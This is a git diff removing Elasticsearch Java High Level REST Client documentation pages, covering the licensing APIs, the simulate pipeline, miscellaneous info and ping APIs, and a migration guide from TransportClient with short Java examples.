- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-request-verbose] --------------------------------------------------- -<1> To see the intermediate results of each processor in the simulate request, you can add the verbose parameter -to the request. - -[[java-rest-high-ingest-simulate-pipeline-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-execute] --------------------------------------------------- -<1> Execute the request and get back the response in a `SimulatePipelineResponse` object. - -[[java-rest-high-ingest-simulate-pipeline-async]] -==== Asynchronous Execution - -The asynchronous execution of a simulate pipeline request requires both the `SimulatePipelineRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-execute-async] --------------------------------------------------- -<1> The `SimulatePipelineRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `SimulatePipelineResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-ingest-simulate-pipeline-response]] -==== Simulate Pipeline Response - -The returned `SimulatePipelineResponse` allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/IngestClientDocumentationIT.java[simulate-pipeline-response] --------------------------------------------------- -<1> Get results for each of the documents provided as instance of `List`. -<2> If the request was in verbose mode cast the response to `SimulateDocumentVerboseResult`. -<3> Check the result after each processor is applied. -<4> Get the ingest document for the result obtained in 3. -<5> Or get the failure for the result obtained in 3. -<6> Get the result as `SimulateDocumentBaseResult` if the result was not verbose. -<7> Get the ingest document for the result obtained in 6. -<8> Or get the failure for the result obtained in 6. 
diff --git a/docs/java-rest/high-level/java-builders.asciidoc b/docs/java-rest/high-level/java-builders.asciidoc deleted file mode 100644 index 89f2de5fa9f..00000000000 --- a/docs/java-rest/high-level/java-builders.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[java-rest-high-java-builders]] -== Using Java Builders - -The Java High Level REST Client depends on the Elasticsearch core project which provides -different types of Java `Builders` objects, including: - -Query Builders:: - -The query builders are used to create the query to execute within a search request. There -is a query builder for every type of query supported by the Query DSL. Each query builder -implements the `QueryBuilder` interface and allows to set the specific options for a given -type of query. Once created, the `QueryBuilder` object can be set as the query parameter of -`SearchSourceBuilder`. The <> -page shows an example of how to build a full search request using `SearchSourceBuilder` and -`QueryBuilder` objects. The <> page -gives a list of all available search queries with their corresponding `QueryBuilder` objects -and `QueryBuilders` helper methods. - -Aggregation Builders:: - -Similarly to query builders, the aggregation builders are used to create the aggregations to -compute during a search request execution. There is an aggregation builder for every type of -aggregation (or pipeline aggregation) supported by Elasticsearch. All builders extend the -`AggregationBuilder` class (or `PipelineAggregationBuilder`class). Once created, `AggregationBuilder` -objects can be set as the aggregation parameter of `SearchSourceBuilder`. There is a example -of how `AggregationBuilder` objects are used with `SearchSourceBuilder` objects to define the aggregations -to compute with a search query in <> page. -The <> page gives a list of all available -aggregations with their corresponding `AggregationBuilder` objects and `AggregationBuilders` helper methods. - -include::query-builders.asciidoc[] -include::aggs-builders.asciidoc[] diff --git a/docs/java-rest/high-level/licensing/delete-license.asciidoc b/docs/java-rest/high-level/licensing/delete-license.asciidoc deleted file mode 100644 index d9aec6e57a1..00000000000 --- a/docs/java-rest/high-level/licensing/delete-license.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[[java-rest-high-delete-license]] -=== Delete License - -[[java-rest-high-delete-license-execution]] -==== Execution - -The license can be deleted using the `deleteLicense()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[delete-license-execute] --------------------------------------------------- - -[[java-rest-high-delete-license-response]] -==== Response - -The returned `DeleteLicenseResponse` contains the `acknowledged` flag, which -returns true if the request was processed by all nodes. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[delete-license-response] --------------------------------------------------- -<1> Check the acknowledge flag. It should be true if license deletion is acknowledged. 
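A compact sketch of the synchronous flow described above; the response type is shown as `AcknowledgedResponse`, which newer clients return in place of `DeleteLicenseResponse`:

[source,java]
--------------------------------------------------
DeleteLicenseRequest request = new DeleteLicenseRequest();
AcknowledgedResponse response = client.license().deleteLicense(request, RequestOptions.DEFAULT);
boolean acknowledged = response.isAcknowledged();
--------------------------------------------------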
-
-[[java-rest-high-delete-license-async]]
-==== Asynchronous Execution
-
-This request can be executed asynchronously:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests}/LicensingDocumentationIT.java[delete-license-execute-async]
--------------------------------------------------
-<1> The `DeleteLicenseRequest` to execute and the `ActionListener` to use when
-the execution completes
-
-The asynchronous method does not block and returns immediately. Once it is
-completed the `ActionListener` is called back using the `onResponse` method
-if the execution successfully completed or using the `onFailure` method if
-it failed.
-
-A typical listener for `DeleteLicenseResponse` looks like:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests}/LicensingDocumentationIT.java[delete-license-execute-listener]
--------------------------------------------------
-<1> Called when the execution is successfully completed. The response is
-provided as an argument
-<2> Called in case of failure. The raised exception is provided as an argument
diff --git a/docs/java-rest/high-level/licensing/get-basic-status.asciidoc b/docs/java-rest/high-level/licensing/get-basic-status.asciidoc
deleted file mode 100644
index ffca094a592..00000000000
--- a/docs/java-rest/high-level/licensing/get-basic-status.asciidoc
+++ /dev/null
@@ -1,23 +0,0 @@
-[[java-rest-high-get-basic-status]]
-=== Get Basic Status
-
-[[java-rest-high-get-basic-status-execution]]
-==== Execution
-
-The basic status of the license can be retrieved as follows:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-basic-status-execute]
--------------------------------------------------
-
-[[java-rest-high-get-basic-status-response]]
-==== Response
-
-The returned `GetBasicStatusResponse` holds only a `boolean` flag:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-basic-status-response]
--------------------------------------------------
-<1> Whether the license is eligible to start basic or not
diff --git a/docs/java-rest/high-level/licensing/get-license.asciidoc b/docs/java-rest/high-level/licensing/get-license.asciidoc
deleted file mode 100644
index 17eb89450fb..00000000000
--- a/docs/java-rest/high-level/licensing/get-license.asciidoc
+++ /dev/null
@@ -1,50 +0,0 @@
-[[java-rest-high-get-license]]
-=== Get License
-
-[[java-rest-high-get-license-execution]]
-==== Execution
-
-The license can be retrieved using the `getLicense()` method:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-license-execute]
--------------------------------------------------
-
-[[java-rest-high-get-license-response]]
-==== Response
-
-The returned `GetLicenseResponse` contains the license in JSON format.
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-license-response]
--------------------------------------------------
-<1> The text of the license.
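As a quick sketch of the synchronous flow (variable names are arbitrary):

[source,java]
--------------------------------------------------
GetLicenseRequest request = new GetLicenseRequest();
GetLicenseResponse response = client.license().getLicense(request, RequestOptions.DEFAULT);
String licenseJson = response.getLicenseDefinition();   // the license as a JSON string
--------------------------------------------------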
- -[[java-rest-high-get-license-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-license-execute-async] --------------------------------------------------- -<1> The `GetLicenseRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `GetLicenseResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-license-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/licensing/get-trial-status.asciidoc b/docs/java-rest/high-level/licensing/get-trial-status.asciidoc deleted file mode 100644 index f117f9aa838..00000000000 --- a/docs/java-rest/high-level/licensing/get-trial-status.asciidoc +++ /dev/null @@ -1,23 +0,0 @@ -[[java-rest-high-get-trial-status]] -=== Get Trial Status - -[[java-rest-high-get-trial-status-execution]] -==== Execution - -The trial status of the license can be retrieved as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-trial-status-execute] --------------------------------------------------- - -[[java-rest-high-get-trial-status-response]] -==== Response - -The returned `GetTrialStatusResponse` holds only a `boolean` flag: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[get-trial-status-response] --------------------------------------------------- -<1> Whether the license is eligible to start trial or not diff --git a/docs/java-rest/high-level/licensing/put-license.asciidoc b/docs/java-rest/high-level/licensing/put-license.asciidoc deleted file mode 100644 index 945d447317b..00000000000 --- a/docs/java-rest/high-level/licensing/put-license.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[[java-rest-high-put-license]] -=== Update License - -[[java-rest-high-put-license-execution]] -==== Execution - -The license can be added or updated using the `putLicense()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[put-license-execute] --------------------------------------------------- -<1> Set the categories of information to retrieve. The default is to -return no information which is useful for checking if {xpack} is installed -but not much else. -<2> A JSON document containing the license information. - -[[java-rest-high-put-license-response]] -==== Response - -The returned `PutLicenseResponse` contains the `LicensesStatus`, -`acknowledged` flag and possible acknowledge messages. 
The acknowledge messages -are present if you previously had a license with more features than one you -are trying to update and you didn't set the `acknowledge` flag to `true`. In this case -you need to display the messages to the end user and if they agree, resubmit the -license with the `acknowledge` flag set to `true`. Please note that the request will -still return a 200 return code even if requires an acknowledgement. So, it is -necessary to check the `acknowledged` flag. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[put-license-response] --------------------------------------------------- -<1> The status of the license -<2> Make sure that the license is valid. -<3> Check the acknowledge flag. It should be true if license is acknowledged. -<4> Otherwise we can see the acknowledge messages in `acknowledgeHeader()` -<5> and check component-specific messages in `acknowledgeMessages()`. - -[[java-rest-high-put-license-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[put-license-execute-async] --------------------------------------------------- -<1> The `PutLicenseRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `PutLicenseResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[put-license-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/licensing/start-basic.asciidoc b/docs/java-rest/high-level/licensing/start-basic.asciidoc deleted file mode 100644 index 3ff50cfd2db..00000000000 --- a/docs/java-rest/high-level/licensing/start-basic.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[[java-rest-high-start-basic]] -=== Start Basic License - -[[java-rest-high-start-basic-execution]] -==== Execution - -This API creates and enables a basic license using the `startBasic()` method. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-basic-execute] --------------------------------------------------- - -[[java-rest-high-start-basic-response]] -==== Response - -The returned `StartBasicResponse` returns a field indicating whether the -basic was started. If it was started, the response returns a the type of -license started. If it was not started, it returns an error message describing -why. - -Acknowledgement messages may also be returned if this API was called without -the `acknowledge` flag set to `true`. In this case you need to display the -messages to the end user and if they agree, resubmit the request with the -`acknowledge` flag set to `true`. 
Please note that the response will still -return a 200 return code even if it requires an acknowledgement. So, it is -necessary to check the `acknowledged` flag. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-basic-response] --------------------------------------------------- -<1> Whether or not the request had the `acknowledge` flag set -<2> Whether or not this request caused a basic to start -<3> If this request did not cause a basic to start, a message explaining why -<4> If the user's request did not have the `acknowledge` flag set, a summary -of the user's acknowledgement required for this API -<5> If the user's request did not have the `acknowledge` flag set, contains -keys of commercial features and values of messages describing how they will -be affected by licensing changes as the result of starting a basic - -[[java-rest-high-start-basic-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-basic-execute-async] --------------------------------------------------- -<1> The `StartBasicResponse` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `StartBasicResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-basic-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/licensing/start-trial.asciidoc b/docs/java-rest/high-level/licensing/start-trial.asciidoc deleted file mode 100644 index 0f198a391f0..00000000000 --- a/docs/java-rest/high-level/licensing/start-trial.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[[java-rest-high-start-trial]] -=== Start Trial - -[[java-rest-high-start-trial-execution]] -==== Execution - -This API creates and enables a trial license using the `startTrial()` -method. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-trial-execute] ---------------------------------------------------- -<1> Sets the "acknowledge" parameter to true, indicating the user has -acknowledged that starting a trial license may affect commercial features - -[[java-rest-high-start-trial-response]] -==== Response - -The returned `StartTrialResponse` returns a field indicating whether the -trial was started. If it was started, the response returns a the type of -license started. If it was not started, it returns an error message describing -why. - -Acknowledgement messages may also be returned if this API was called without -the `acknowledge` flag set to `true`. 
In this case you need to display the -messages to the end user and if they agree, resubmit the request with the -`acknowledge` flag set to `true`. Please note that the response will still -return a 200 return code even if it requires an acknowledgement. So, it is -necessary to check the `acknowledged` flag. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-trial-response] --------------------------------------------------- -<1> Whether or not the request had the `acknowledge` flag set -<2> Whether or not this request caused a trial to start -<3> If this request caused a trial to start, which type of license it -registered -<4> If this request did not cause a trial to start, a message explaining why -<5> If the user's request did not have the `acknowledge` flag set, a summary -of the user's acknowledgement required for this API -<6> If the user's request did not have the `acknowledge` flag set, contains -keys of commercial features and values of messages describing how they will -be affected by licensing changes as the result of starting a trial - -[[java-rest-high-start-trial-async]] -==== Asynchronous execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-trial-execute-async] --------------------------------------------------- - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `StartTrialResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/LicensingDocumentationIT.java[start-trial-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument \ No newline at end of file diff --git a/docs/java-rest/high-level/migration.asciidoc b/docs/java-rest/high-level/migration.asciidoc deleted file mode 100644 index c8db57f5259..00000000000 --- a/docs/java-rest/high-level/migration.asciidoc +++ /dev/null @@ -1,289 +0,0 @@ -[[java-rest-high-level-migration]] -== Migration Guide - -This section describes how to migrate existing code from the `TransportClient` -to the Java High Level REST Client released with the version 5.6.0 -of Elasticsearch. - -=== Motivations around a new Java client - -The existing `TransportClient` has been part of Elasticsearch since https://github.com/elastic/elasticsearch/blob/b3337c312765e51cec7bde5883bbc0a08f56fb65/modules/elasticsearch/src/main/java/org/elasticsearch/client/transport/TransportClient.java[its very first commit]. - It is a special client as it uses the transport protocol to communicate with Elasticsearch, - which causes compatibility problems if the client is not on the same version as the - Elasticsearch instances it talks to. - -We released a low-level REST client in 2016, which is based on the well known Apache HTTP -client and it allows to communicate with an Elasticsearch cluster in any version using HTTP. 
-On top of that we released the high-level REST client which is based on the low-level client -but takes care of request marshalling and response un-marshalling. - -If you're interested in knowing more about these changes, we wrote a blog post about the -https://www.elastic.co/blog/state-of-the-official-elasticsearch-java-clients[state of the official Elasticsearch Java clients]. - -=== Prerequisite - -The Java High Level Rest Client requires Java `1.8` and can be used to send requests -to an <>. - -=== How to migrate - -Adapting existing code to use the `RestHighLevelClient` instead of the `TransportClient` -requires the following steps: - -- Update dependencies -- Update client initialization -- Update application code - -=== Updating the dependencies - -Java application that uses the `TransportClient` depends on the -`org.elasticsearch.client:transport` artifact. This dependency -must be replaced by a new dependency on the high-level client. - -The <> page shows - typical configurations for Maven and Gradle and presents the - <> brought by the - high-level client. - -// This ID is bad but it is the one we've had forever. -[[_changing_the_client_8217_s_initialization_code]] -=== Changing the client's initialization code - -The `TransportClient` is typically initialized as follows: -[source,java] --------------------------------------------------- -Settings settings = Settings.builder() - .put("cluster.name", "prod").build(); - -TransportClient transportClient = new PreBuiltTransportClient(settings) - .addTransportAddress(new TransportAddress(InetAddress.getByName("localhost"), 9300)) - .addTransportAddress(new TransportAddress(InetAddress.getByName("localhost"), 9301)); --------------------------------------------------- - -The initialization of a `RestHighLevelClient` is different. It requires to provide -a <> as a constructor -argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[rest-high-level-client-init] --------------------------------------------------- - -NOTE: The `RestClient` uses Elasticsearch's HTTP service which is - bounded by default on `9200`. This port is different from the port - used to connect to Elasticsearch with a `TransportClient`. - -The `RestHighLevelClient` is thread-safe. It is typically instantiated by the -application at startup time or when the first request is executed. - -Once the `RestHighLevelClient` is initialized, it can be used to execute any -of the <>. - -As with the `TransportClient`, the `RestHighLevelClient` must be closed when it -is not needed anymore or when the application is stopped. - -The code that closes the `TransportClient`: - -[source,java] --------------------------------------------------- -transportClient.close(); --------------------------------------------------- - -must be replaced with: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[rest-high-level-client-close] --------------------------------------------------- - -// This ID is bad but it is the one we've had forever. -[[_changing_the_application_8217_s_code]] -=== Changing the application's code - -The `RestHighLevelClient` supports the same request and response objects -as the `TransportClient`, but exposes slightly different methods to -send the requests. 
- -More importantly, the high-level client: - -- does not support request builders. The legacy methods like -`client.prepareIndex()` must be changed to use - request constructors like `new IndexRequest()` to create requests - objects. The requests are then executed using synchronous or - asynchronous dedicated methods like `client.index()` or `client.indexAsync()`. - -==== How to migrate the way requests are built - -The Java API provides two ways to build a request: by using the request's constructor or by using -a request builder. Migrating from the `TransportClient` to the high-level client can be -straightforward if application's code uses the former, while changing usages of the latter can -require more work. - -[[java-rest-high-level-migration-request-ctor]] -===== With request constructors - -When request constructors are used, like in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-request-ctor] --------------------------------------------------- -<1> Create an `IndexRequest` using its constructor and id() setter. - -The migration is very simple. The execution using the `TransportClient`: - -[source,java] --------------------------------------------------- -IndexResponse response = transportClient.index(indexRequest).actionGet(); --------------------------------------------------- - -Can be easily replaced to use the `RestHighLevelClient`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-request-ctor-execution] --------------------------------------------------- - -[[java-rest-high-level-migration-request-builder]] -===== With request builders - -The Java API provides a request builder for every type of request. They are exposed by the -`TransportClient` through the many `prepare()` methods. Here are some examples: - -[source,java] --------------------------------------------------- -IndexRequestBuilder indexRequestBuilder = transportClient.prepareIndex(); // <1> -DeleteRequestBuilder deleteRequestBuilder = transportClient.prepareDelete(); // <2> -SearchRequestBuilder searchRequestBuilder = transportClient.prepareSearch(); // <3> --------------------------------------------------- -<1> Create a `IndexRequestBuilder` using the `prepareIndex()` method from the `TransportClient`. The -request builder encapsulates the `IndexRequest` to be executed. -<2> Create a `DeleteRequestBuilder` using the `prepareDelete()` method from the `TransportClient`. The -request builder encapsulates the `DeleteRequest` to be executed. -<3> Create a `SearchRequestBuilder` using the `prepareSearch()` method from the `TransportClient`. The -request builder encapsulates the `SearchRequest` to be executed. - -Since the Java High Level REST Client does not support request builders, applications that use -them must be changed to use <> instead. - -NOTE: While you are incrementally migrating your application and you have both the transport client -and the high level client available you can always get the `Request` object from the `Builder` object -by calling `Builder.request()`. We do not advise continuing to depend on the builders in the long run -but it should be possible to use them during the transition from the transport client to the high -level rest client. 
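A hypothetical sketch of that interim pattern, assuming both clients are on the classpath (the index name, type, id, and field are made up; the `RequestOptions` overload is the newer client signature):

[source,java]
--------------------------------------------------
IndexRequestBuilder builder = transportClient.prepareIndex("my-index", "_doc", "1")
        .setSource("field", "value");
IndexRequest request = builder.request();   // reuse the request produced by the builder
IndexResponse response = restHighLevelClient.index(request, RequestOptions.DEFAULT);
--------------------------------------------------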
- -==== How to migrate the way requests are executed - -The `TransportClient` allows to execute requests in both synchronous and asynchronous ways. This is also -possible using the high-level client. - -===== Synchronous execution - -The following example shows how a `DeleteRequest` can be synchronously executed using the `TransportClient`: - -[source,java] --------------------------------------------------- -DeleteRequest request = new DeleteRequest("index", "doc", "id"); // <1> -DeleteResponse response = transportClient.delete(request).actionGet(); // <2> --------------------------------------------------- -<1> Create the `DeleteRequest` using its constructor -<2> Execute the `DeleteRequest`. The `actionGet()` method blocks until a -response is returned by the cluster. - -The same request synchronously executed using the high-level client is: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-request-sync-execution] --------------------------------------------------- -<1> Execute the `DeleteRequest`. The `delete()` method blocks until a -response is returned by the cluster. - -===== Asynchronous execution - -The following example shows how a `DeleteRequest` can be asynchronously executed using the `TransportClient`: - -[source,java] --------------------------------------------------- -DeleteRequest request = new DeleteRequest("index", "doc", "id"); // <1> -transportClient.delete(request, new ActionListener() { // <2> - @Override - public void onResponse(DeleteResponse deleteResponse) { - // <3> - } - - @Override - public void onFailure(Exception e) { - // <4> - } -}); --------------------------------------------------- -<1> Create the `DeleteRequest` using its constructor -<2> Execute the `DeleteRequest` by passing the request and a -`ActionListener` that gets called on execution completion or -failure. This method does not block and returns immediately. -<3> The `onResponse()` method is called when the response is -returned by the cluster. -<4> The `onFailure()` method is called when an error occurs -during the execution of the request. - -The same request asynchronously executed using the high-level client is: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-request-async-execution] --------------------------------------------------- -<1> Create the `DeleteRequest` using its constructor -<2> Execute the `DeleteRequest` by passing the request and a -`ActionListener` that gets called on execution completion or -failure. This method does not block and returns immediately. -<3> The `onResponse()` method is called when the response is -returned by the cluster. -<4> The `onFailure()` method is called when an error occurs -during the execution of the request. - -[[java-rest-high-level-migration-cluster-health]] -==== Checking Cluster Health using the Low-Level REST Client - -Another common need is to check the cluster's health using the Cluster API. 
With
-the `TransportClient` it can be done this way:
-
-[source,java]
--------------------------------------------------
-ClusterHealthResponse response = client.admin().cluster().prepareHealth().get(); // <1>
-
-ClusterHealthStatus healthStatus = response.getStatus(); // <2>
-if (healthStatus != ClusterHealthStatus.GREEN) {
-    // <3>
-}
--------------------------------------------------
-<1> Execute a cluster health request with default parameters
-<2> Retrieve the cluster's health status from the response
-<3> Handle the situation where the cluster's health is not green
-
-With the low-level client, the code can be changed to:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests}/MigrationDocumentationIT.java[migration-cluster-health]
--------------------------------------------------
-<1> Set up the request to wait for the cluster's health to become green if it isn't already.
-<2> Make the request and get back a `Response` object.
-<3> Retrieve an `InputStream` object in order to read the response's content.
-<4> Parse the response's content using Elasticsearch's helper class `XContentHelper`. This
-    helper requires the content type of the response to be passed as an argument and returns
-    a `Map` of objects. Values in the map can be of any type, including inner `Map`s that are
-    used to represent the JSON object hierarchy.
-<5> Retrieve the value of the `status` field in the response map, cast it to a `String`
-object and use the `ClusterHealthStatus.fromString()` method to convert it to a `ClusterHealthStatus`
-object. This method throws an exception if the value does not correspond to a valid cluster
-health status.
-<6> Handle the situation where the cluster's health is not green.
-
-Note that for convenience this example uses Elasticsearch's helpers to parse the JSON response
-body, but any other JSON parser could have been used instead.
-
-=== Provide feedback
-
-We love to hear from you! Please give us your feedback about your migration
-experience and how to improve the Java High Level REST Client on https://discuss.elastic.co/[our forum].
diff --git a/docs/java-rest/high-level/migration/get-deprecation-info.asciidoc b/docs/java-rest/high-level/migration/get-deprecation-info.asciidoc
deleted file mode 100644
index 3cda1c2f503..00000000000
--- a/docs/java-rest/high-level/migration/get-deprecation-info.asciidoc
+++ /dev/null
@@ -1,36 +0,0 @@
---
-:api: get-deprecation-info
-:request: DeprecationInfoRequest
-:response: DeprecationInfoResponse
---
-
-[id="{upid}-{api}"]
-=== Get Deprecation Info
-
-[id="{upid}-{api}-request"]
-==== Get Deprecation Info Request
-
-A +{request}+ can be applied to one or more indices:
-
-["source","java",subs="attributes,callouts,macros"]
--------------------------------------------------
-include-tagged::{doc-tests-file}[{api}-request]
--------------------------------------------------
-<1> Create a new request instance
-
-include::../execution.asciidoc[]
-
-[id="{upid}-{api}-response"]
-==== Get Deprecation Info Response
-
-The returned +{response}+ contains information about deprecated features currently
-in use at the cluster, node, and index level.
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> a List of Cluster deprecations -<2> a List of Node deprecations -<3> a Map of key IndexName, value List of deprecations for the index -<4> a list of Machine Learning related deprecations diff --git a/docs/java-rest/high-level/miscellaneous/main.asciidoc b/docs/java-rest/high-level/miscellaneous/main.asciidoc deleted file mode 100644 index 635fe6f3b99..00000000000 --- a/docs/java-rest/high-level/miscellaneous/main.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[[java-rest-high-main]] -=== Info API - -[[java-rest-high-main-request]] -==== Execution - -Cluster information can be retrieved using the `info()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[main-execute] --------------------------------------------------- - -[[java-rest-high-main-response]] -==== Response - -The returned `MainResponse` provides various kinds of information about the cluster: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[main-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/miscellaneous/ping.asciidoc b/docs/java-rest/high-level/miscellaneous/ping.asciidoc deleted file mode 100644 index 6cff46a62c5..00000000000 --- a/docs/java-rest/high-level/miscellaneous/ping.asciidoc +++ /dev/null @@ -1,13 +0,0 @@ -[[java-rest-high-ping]] -=== Ping API - -[[java-rest-high-ping-request]] -==== Execution - -The `ping()` method checks if the cluster is up and available to -process requests and returns a boolean: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[ping-execute] --------------------------------------------------- diff --git a/docs/java-rest/high-level/miscellaneous/x-pack-info.asciidoc b/docs/java-rest/high-level/miscellaneous/x-pack-info.asciidoc deleted file mode 100644 index b432b10d3b8..00000000000 --- a/docs/java-rest/high-level/miscellaneous/x-pack-info.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[java-rest-high-x-pack-info]] -=== X-Pack Info API - -[[java-rest-high-x-pack-info-execution]] -==== Execution - -General information about the installed {xpack} features can be retrieved -using the `xPackInfo()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/MiscellaneousDocumentationIT.java[x-pack-info-execute] --------------------------------------------------- -<1> Enable verbose mode. The default is `false` but `true` will return -more information. -<2> Set the categories of information to retrieve. The default is to -return no information which is useful for checking if {xpack} is installed -but not much else. - -[[java-rest-high-x-pack-info-response]] -==== Response - -The returned `XPackInfoResponse` can contain `BuildInfo`, `LicenseInfo`, -and `FeatureSetsInfo` depending on the categories requested. 
